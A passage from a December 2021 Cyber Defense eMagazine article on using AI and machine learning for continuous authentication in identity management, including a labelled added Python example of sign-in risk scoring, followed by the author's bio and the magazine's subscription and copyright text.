• Remote Work: As a largely remote workforce becomes the norm, valid, constantly updated PKI on<br />
organizational systems not only makes remote access secure, it also keeps employees' devices<br />
secure by enabling authenticated over-the-air updates.<br />
Infusing AI and ML in Identity Management to thrive in the current and post-pandemic world<br />
In recent years, artificial intelligence (AI) and machine learning (ML) have been quietly transforming<br />
industries. With cyberattacks becoming more sophisticated and ransomware demands continuing to<br />
rise, new tools with advanced AI and ML capabilities are needed.<br />
Machine learning uses algorithms to analyze large quantities of data and uncover patterns that enable<br />
accurate predictions. According to Gartner, IAM is "the security discipline that enables the right individuals<br />
to access the right resources at the right times for the right reasons.”<br />
Adding ML capabilities to IAM solutions helps authenticate the user and decide whether they should be<br />
granted access to specific applications or data. In other words, it helps validate that these are the right<br />
resources for a particular user.<br />
AI is instrumental in the future of IAM since it recognizes patterns and expands knowledge exponentially<br />
at the same rate as risk. Continuous authentication ensures that <strong>for</strong> every interaction, the context of a<br />
user is constantly evaluated. Organizations can detect potential threats easily as AI analyzes interactions<br />
while considering time, place, and even user movement. All these analytics help calculate the level of<br />
potential risk at every point.<br />
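As an added example that is not part of the article, the following Python sketches the context-based risk scoring the paragraph describes: each sign-in event is scored against the previous one using time of day, an unseen device, and the travel speed implied by the change of place. The events, thresholds and weights are constructed for illustration, not taken from any product.<br />

```python
# Added example (not from the article): context-based risk scoring for continuous
# authentication. Events, thresholds and weights below are constructed for illustration.
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

@dataclass
class Event:
    ts: datetime
    lat: float
    lon: float
    device_id: str

def distance_km(a: Event, b: Event) -> float:  # haversine great-circle distance
    dlat = radians(b.lat - a.lat)
    dlon = radians(b.lon - a.lon)
    h = sin(dlat / 2) ** 2 + cos(radians(a.lat)) * cos(radians(b.lat)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))

def score_event(prev, cur: Event, known_devices: set) -> tuple:
    """Score one interaction from its context: time, device and movement."""
    score, reasons = 0, []
    if cur.ts.hour < 6 or cur.ts.hour >= 22:          # outside working hours
        score += 1; reasons.append("off-hours")
    if cur.device_id not in known_devices:            # device never seen before
        score += 2; reasons.append("new device")
    if prev is not None:                              # speed implied by change of place
        hours = (cur.ts - prev.ts).total_seconds() / 3600
        if hours > 0 and distance_km(prev, cur) / hours > 900:  # km/h, faster than an airliner
            score += 3; reasons.append("impossible travel")
    return score, reasons

def risk_level(score: int) -> str:
    return "high" if score >= 3 else "medium" if score >= 1 else "low"

def evaluate(events, known_devices):
    """Continuous evaluation: every event is scored against the one before it."""
    out, prev = [], None
    for ev in sorted(events, key=lambda e: e.ts):
        score, reasons = score_event(prev, ev, known_devices)
        out.append((ev.ts.isoformat(), risk_level(score), reasons))
        prev = ev
    return out

# Constructed sample: New York, London two hours later, then a never-seen phone.
KNOWN_DEVICES = {"laptop-1"}
SAMPLE_EVENTS = [
    Event(datetime(2021, 12, 3, 9, 0), 40.7128, -74.0060, "laptop-1"),
    Event(datetime(2021, 12, 3, 11, 0), 51.5074, -0.1278, "laptop-1"),
    Event(datetime(2021, 12, 4, 14, 0), 40.7128, -74.0060, "phone-9"),
]
```

Calling `evaluate(SAMPLE_EVENTS, KNOWN_DEVICES)` rates the London event "high" (impossible travel) and the new-phone event "medium"; in practice the weights would be learned from an organization's own sign-in history rather than fixed by hand.<br />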
AI-based tools built on machine learning ease the authentication burden on users and add<br />
enhanced security fueled by robust identity management and access controls.<br />
Organizations need to embrace a holistic cybersecurity strategy that is forward-looking, reduces<br />
access and compliance costs, and helps them stay agile and flexible while accelerating their journey to the<br />
cloud.<br />
Cyber Defense eMagazine – December 2021 Edition 141<br />
Copyright © 2021, Cyber Defense Magazine. All rights reserved worldwide.
About the Author<br />
Murali Palanisamy, chief solutions officer, AppViewX, is<br />
responsible for overall product vision, development and<br />
technical direction of AppViewX. Prior to AppViewX, he was<br />
a Senior Vice President at Bank of America, where he was<br />
leading the e-commerce application delivery's architecture<br />
and engineering team. He also served as VP of Architecture<br />
and Product Engineering for Merrill Lynch, where he<br />
designed and developed automation and integration solutions<br />
for servers, application delivery controllers, IP services and<br />
networking. Murali can be reached through his LinkedIn and through AppViewX:<br />
https://www.appviewx.com/talk-to-an-expert/.<br />
CyberDefense.TV now has 200 hotseat interviews and growing…<br />
Market leaders, innovators, CEO hot seat interviews and much more.<br />
A division of Cyber Defense Media Group and sister to Cyber Defense Magazine.<br />
Free Monthly Cyber Defense eMagazine Via Email<br />
Enjoy our monthly electronic editions of our Magazines for FREE.<br />
This magazine is by and for ethical information security professionals with a twist on innovative consumer<br />
products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our<br />
mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best<br />
ideas, products and services in the information technology industry. Our monthly Cyber Defense<br />
e-Magazines will also keep you up to speed on what's happening in the cyber-crime and cyber warfare<br />
arena, plus we'll inform you as next generation and innovative technology vendors have news worthy of<br />
sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here<br />
to sign up today and within moments, you'll receive your first email from us with an archive of our<br />
newsletters along with this month's newsletter.<br />
By signing up, you'll always be in the loop with CDM.<br />
Copyright (C) 2021, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.<br />
SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a<br />
CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com,<br />
CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability<br />
Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, Cyber<br />
Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS#<br />
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com<br />
All rights reserved worldwide. Copyright © 2021, Cyber Defense Magazine. All rights reserved. No part of this<br />
newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,<br />
recording, taping or by any information storage retrieval system without the written permission of the publisher<br />
except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of<br />
the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may<br />
no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect<br />
the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content<br />
and we'll post it in the magazine for free, subject to editorial approval and layout. Email us at<br />
marketing@cyberdefensemagazine.com<br />
Cyber Defense Magazine<br />
276 Fifth Avenue, Suite 704, New York, NY 10001<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
marketing@cyberdefensemagazine.com<br />
www.cyberdefensemagazine.com<br />
NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)<br />
Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 12/03/2021<br />
Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH<br />
(with others coming soon...)<br />
9+ Years in The Making…<br />
Thank You to our Loyal Subscribers!<br />
We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile<br />
and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365<br />
uptime as we continue to scale with improved Web App Firewalls, Content Delivery Networks (CDNs)<br />
around the Globe, Faster and More Secure DNS and CyberDefenseMagazine.com up and running as an<br />
array of live mirror sites and our new B2C consumer magazine CyberSecurityMagazine.com. Millions of<br />
monthly readers and new platforms coming…starting with https://www.cyberdefenseprofessionals.com this<br />
month…<br />